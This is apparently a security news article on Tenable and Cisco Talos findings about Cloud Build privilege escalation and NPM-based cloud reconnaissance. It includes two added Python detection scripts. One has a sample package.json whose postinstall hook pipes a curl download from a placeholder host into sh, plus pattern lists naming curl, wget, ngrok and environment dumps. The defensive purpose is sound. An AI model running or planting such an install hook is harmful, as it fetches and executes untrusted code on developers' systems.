Hidden Backdoors in the Cloud: New Exploits Target Google, AWS, and Azure Services

Cloud security has taken center stage once again as researchers from Tenable and Cisco Talos uncover serious vulnerabilities in how Google Cloud Platform (GCP) handles service permissions. These findings show just how easily cybercriminals could exploit default configurations in GCP’s Cloud Functions and Cloud Build — extending even to AWS and Azure. The implications are widespread and serious, signaling a call to action for cloud users and administrators across the board.

How Attackers Are Exploiting the Cloud: What the Research Reveals

Researchers have recently revealed how attackers could abuse Google Cloud services using seemingly benign components like Cloud Functions and Cloud Build. These are tools meant to simplify serverless app deployment, but when misconfigured, they become prime targets for malicious activity.

Tenable’s research zeroed in on a loophole involving the default Cloud Build service account. Whenever a Cloud Function is created or modified, it triggers Cloud Build, which historically received overly generous permissions by default. Attackers leveraging this flaw could escalate their privileges, granting themselves admin-like access across a project’s cloud environment.

Cisco Talos built on this by showing how attackers could insert malicious code into the build pipeline using NPM packages and tools like Ngrok. Their test setup showed how an attacker could deploy a package with a manipulated package.json file. When included in a Cloud Run deployment, it allowed unauthorized access to network configurations, Docker container presence, and even kernel-level information — all sent back to the attacker’s own server.

Even though Google has patched this specific privilege escalation issue, the underlying techniques still work in different forms. The same model of attack was shown to be adaptable to AWS Lambda and Azure Functions, primarily by smuggling malicious NPM code into Node.js runtimes.

Attackers could still perform environment reconnaissance by running scripts that check for Docker configurations, network paths, CPU settings, and mounted volumes. This kind of intel helps them plan and execute more sophisticated attacks, including lateral movement across cloud systems.

Google responded by limiting the default permissions of Cloud Build service accounts and offering new policy controls. Still, experts emphasize that the risk hasn’t vanished. They recommend enforcing strict permission boundaries, regularly updating systems, and closely monitoring network behavior for suspicious activity, especially involving tunneling services like Ngrok.

The main takeaway? While the specific exploit may be patched, the threat landscape remains dynamic. Companies must maintain vigilant, proactive security strategies to combat the ever-evolving tactics of cloud attackers.

What Undercode Says:

This case serves as a textbook example of how default permissions and misconfigurations can quietly open doors for attackers, especially in complex cloud environments. The discovery by Tenable and Cisco Talos uncovers a deeper truth: cloud security isn’t just about patching known bugs — it’s about addressing architectural weaknesses that attackers are increasingly exploiting.

Cloud Build and Cloud Functions are core elements of GCP’s serverless ecosystem. They offer automation, speed, and convenience. But when a default service account is allowed to operate with excessive permissions, attackers can repurpose that automation pipeline to their advantage. Privilege escalation isn’t just a buzzword — it’s a gateway to total cloud compromise.

The analytical brilliance of Cisco Talos lies in their proof-of-concept using Debian Linux with NPM and Ngrok. By embedding rogue code in the build process, they show how easily malicious payloads can travel through legitimate channels, escaping early detection. This points to a growing trend: attackers no longer need to brute-force access — they simply piggyback on misused services and neglected configurations.

What’s more alarming is how these tactics are cloud-agnostic. Whether it’s GCP, AWS, or Azure, the core vulnerability comes from how permissions are managed and how build pipelines are monitored — or not. The use of NPM packages in these attacks is also critical. Supply chain attacks are becoming more common, and if developers aren’t verifying their packages, they’re essentially handing the keys over to intruders.
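The article's point that unverified packages hand the build pipeline to an intruder comes down to one mechanism: `npm install` runs any lifecycle script a package.json declares. The following is an added example (not code from the article, Tenable or Cisco Talos) that audits a manifest, and optionally a whole installed tree, for install-time hooks and flags the ones that fetch from the network, pipe into a shell, or invoke a tunnelling agent. The sample manifest, the hook list and the pattern list are constructed assumptions for the example; the `placeholder.invalid` host is a placeholder, not a real indicator.

```python
"""Audit package.json manifests for lifecycle scripts that execute during
`npm install` in a CI/CD or Cloud Build job. Example code with constructed
sample data; the heuristics are an assumption, not a complete ruleset."""
import json
import os
import re

# npm runs these hooks automatically at install time (list assumed for the example).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns that warrant a human look, in the order they are reported.
SUSPICIOUS_PATTERNS = [
    (r"\bcurl\b|\bwget\b", "network fetch"),
    (r"\|\s*(sh|bash)\b|\beval\b", "pipe to shell"),
    (r"\bngrok\b", "tunnelling agent"),
    (r"\b(env|printenv)\b|process\.env", "environment dump"),
    (r"\bbase64\b", "encoded payload"),
]

# Constructed sample manifest: one hostile-looking postinstall hook and one
# benign prepare hook. The hostname is an obvious placeholder.
SAMPLE_MANIFEST = json.dumps({
    "name": "sync-helper",
    "version": "1.0.0",
    "scripts": {
        "build": "tsc -p .",
        "test": "node test.js",
        "postinstall": "curl -sL https://placeholder.invalid/setup.sh | sh",
        "prepare": "husky install",
    },
    "dependencies": {"left-pad": "^1.3.0"},
})


def audit_manifest(manifest_text, source="package.json"):
    """Return one finding per lifecycle hook found in the manifest.

    severity is 'high' when the command matches a suspicious pattern and
    'info' otherwise, because any install-time hook deserves review.
    """
    data = json.loads(manifest_text)
    scripts = data.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [label for pat, label in SUSPICIOUS_PATTERNS
                   if re.search(pat, cmd, re.IGNORECASE)]
        findings.append({
            "source": source,
            "package": data.get("name", "?"),
            "hook": hook,
            "command": cmd,
            "severity": "high" if reasons else "info",
            "reasons": reasons,
        })
    return findings


def audit_tree(root):
    """Walk an installed node_modules tree and audit every package.json in it."""
    out = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                out.extend(audit_manifest(fh.read(), source=path))
        except (OSError, ValueError):
            # Unreadable or malformed manifest: skip rather than abort the audit.
            continue
    return out


if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print(f"[{finding['severity']}] {finding['package']} {finding['hook']}: "
              f"{finding['command']}  {finding['reasons']}")
```

In a pipeline this runs after `npm ci --ignore-scripts`, so dependencies are on disk but no hook has executed yet; `audit_tree("node_modules")` then reports every hook before a decision is made to run them.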

The defensive strategy here must evolve beyond simple monitoring. Organizations should adopt least-privilege access across all service accounts, enforce multi-layered approval processes for function deployment, and flag anomalies like new Cloud Functions appearing unexpectedly or unusual outbound traffic to tunneling services.

Additionally, tools that track system calls and behavioral analytics should be integrated into CI/CD pipelines. By understanding what normal deployment looks like, companies can more easily flag when something deviates.
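The two anomalies the article recommends flagging, a Cloud Function appearing outside the expected deployment pattern and outbound traffic to a tunnelling service, can be expressed as checks against a baseline of normal deployment. This added example (not code from the article or the cited researchers) runs those checks over constructed audit and egress records. The record layout loosely mirrors Cloud Audit Log concepts (method name, principal, resource) but is flattened and assumed for the example; the known-deployer set, change window and tunnelling domain suffixes are likewise assumptions to be replaced per environment.

```python
"""Flag unexpected Cloud Function deployments and egress to tunnelling
services against a simple 'normal deployment' baseline. Example code over
constructed records; field names and baseline values are assumptions."""
from datetime import datetime, timezone

# Baseline: identities allowed to create or update functions and the UTC
# hours in which deployments are expected (assumed for the example).
KNOWN_DEPLOYERS = {
    "deploy-bot@example-project.iam.gserviceaccount.com",
    "alice@example.com",
}
CHANGE_WINDOW_UTC = range(8, 18)  # 08:00 to 17:59 UTC

# Methods that create or change a function (Cloud Functions v1 API names).
DEPLOY_METHODS = {
    "google.cloud.functions.v1.CloudFunctionsService.CreateFunction",
    "google.cloud.functions.v1.CloudFunctionsService.UpdateFunction",
}

# ngrok is the service named in the article; the suffix list is an assumption
# and should be extended with whatever tunnelling services matter locally.
TUNNEL_DOMAIN_SUFFIXES = (".ngrok.io", ".ngrok-free.app", ".ngrok.app", ".ngrok-agent.com")

# Constructed audit records (flattened; not the verbatim GCP schema).
AUDIT_RECORDS = [
    {"timestamp": "2025-01-14T10:15:00Z",
     "methodName": "google.cloud.functions.v1.CloudFunctionsService.CreateFunction",
     "principalEmail": "deploy-bot@example-project.iam.gserviceaccount.com",
     "resourceName": "projects/example-project/locations/us-central1/functions/billing-export"},
    {"timestamp": "2025-01-14T23:41:00Z",
     "methodName": "google.cloud.functions.v1.CloudFunctionsService.CreateFunction",
     "principalEmail": "contractor-tmp@example.com",
     "resourceName": "projects/example-project/locations/us-central1/functions/sync-helper"},
    {"timestamp": "2025-01-14T11:02:00Z",
     "methodName": "google.cloud.functions.v1.CloudFunctionsService.ListFunctions",
     "principalEmail": "alice@example.com",
     "resourceName": "projects/example-project/locations/us-central1"},
]

# Constructed egress records, as a flow log or build-time egress proxy might emit.
EGRESS_RECORDS = [
    {"timestamp": "2025-01-14T10:16:30Z", "src": "cloudbuild-worker-7",
     "dst_host": "registry.npmjs.org", "dst_port": 443},
    {"timestamp": "2025-01-14T23:42:10Z", "src": "cloudbuild-worker-3",
     "dst_host": "a1b2c3d4.ngrok.io", "dst_port": 443},
    {"timestamp": "2025-01-14T23:42:11Z", "src": "cloudbuild-worker-3",
     "dst_host": "connect.ngrok-agent.com", "dst_port": 443},
]


def _hour_utc(ts):
    """Hour of day in UTC from an RFC 3339 timestamp ending in 'Z'."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(timezone.utc).hour


def flag_deployments(records):
    """Return deploy events whose principal or time falls outside the baseline."""
    findings = []
    for r in records:
        if r["methodName"] not in DEPLOY_METHODS:
            continue  # reads and list calls are not deployments
        reasons = []
        if r["principalEmail"] not in KNOWN_DEPLOYERS:
            reasons.append("unknown deployer")
        if _hour_utc(r["timestamp"]) not in CHANGE_WINDOW_UTC:
            reasons.append("outside change window")
        if reasons:
            findings.append({"resource": r["resourceName"],
                             "principal": r["principalEmail"],
                             "reasons": reasons})
    return findings


def is_tunnel_host(host):
    """True when the destination is a known tunnelling-service domain or subdomain."""
    h = host.lower().rstrip(".")
    return any(h == s.lstrip(".") or h.endswith(s) for s in TUNNEL_DOMAIN_SUFFIXES)


def flag_tunnel_egress(records):
    """Return egress records whose destination is a tunnelling service."""
    return [{"src": r["src"], "dst_host": r["dst_host"], "timestamp": r["timestamp"]}
            for r in records if is_tunnel_host(r["dst_host"])]


if __name__ == "__main__":
    for f in flag_deployments(AUDIT_RECORDS):
        print("DEPLOY ANOMALY:", f)
    for f in flag_tunnel_egress(EGRESS_RECORDS):
        print("TUNNEL EGRESS:", f)
```

The two findings in the sample line up in time (a function created by an unknown identity at 23:41, tunnel egress from a build worker a minute later), which is the kind of correlation a pipeline-level behavioural baseline is meant to surface; in practice the deploy check reads from exported audit logs and the egress check from flow logs or DNS query logs.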

Lastly, education plays a major role. Cloud engineers and developers must be trained to recognize the risks of misconfigured services and the importance of scrutinizing open-source dependencies. Attackers are counting on ignorance. Knowledge and vigilance are the strongest countermeasures.

Fact Checker Results ✅

✔ Google has patched the excessive permission issue in Cloud Build.
✔ Cisco Talos successfully demonstrated environment enumeration using NPM packages and Ngrok.
✔ Vulnerability tactics remain adaptable to AWS and Azure platforms. 🔍

Prediction 🔮

The next wave of cloud exploits will likely focus on the supply chain, specifically targeting third-party packages and build automation. With tools like NPM being increasingly weaponized, cloud providers and organizations must prepare for more subtle, persistent threats embedded deep within the software lifecycle. Expect attackers to pivot toward CI/CD pipelines, aiming to exploit trust in open-source ecosystems while masking malicious activity through legitimate-looking deployments.

References:

Reported By: cyberpress.org